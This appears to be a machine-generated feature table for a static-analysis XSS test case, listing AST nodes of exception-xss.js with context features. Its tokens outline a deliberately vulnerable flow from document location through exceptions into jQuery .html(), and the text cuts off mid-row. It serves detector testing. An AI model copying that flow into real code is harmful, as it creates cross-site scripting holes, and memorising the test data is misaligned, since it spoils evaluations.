autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | return of function deep | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | return of function deep | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:11:38:14 | deep | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:16:38:16 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:7 | deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:7 | deep2 | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:7 | deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:7 | deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:7 | deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | deep2(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | deep2(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | deep2(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | deep2(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | deep2(x) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:9:39:9 | x | CalleeFlexibleAccessPath | deep2 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:9:39:9 | x | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:9:39:9 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:9:39:9 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:9:39:9 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:9:39:9 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:39:9:39:9 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | this | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:41:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | 'arguments' object of function deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | 'arguments' object of function deep2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | 'arguments' object of function deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | 'arguments' object of function deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | 'arguments' object of function deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | exceptional return of function deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | exceptional return of function deep2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | exceptional return of function deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | exceptional return of function deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | exceptional return of function deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | functio ... (x);\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | functio ... (x);\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | functio ... (x);\\n\\t} | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | functio ... (x);\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | functio ... (x);\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | return of function deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | return of function deep2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | return of function deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | return of function deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:2:43:2 | return of function deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:11:41:15 | deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:41:17:41:17 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:7 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:7 | inner | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:7 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:7 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:7 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | exceptional return of inner(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | exceptional return of inner(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | exceptional return of inner(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | exceptional return of inner(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | exceptional return of inner(x) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | inner(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | inner(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | inner(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | inner(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:3:42:10 | inner(x) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:9:42:9 | x | CalleeFlexibleAccessPath | inner | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:9:42:9 | x | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:9:42:9 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:9:42:9 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:9:42:9 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:9:42:9 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:42:9:42:9 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:6 | deep | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:6 | deep | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:6 | deep | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:6 | deep | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:6 | deep | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | deep("bar" + foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | deep("bar" + foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | deep("bar" + foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | deep("bar" + foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | deep("bar" + foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ 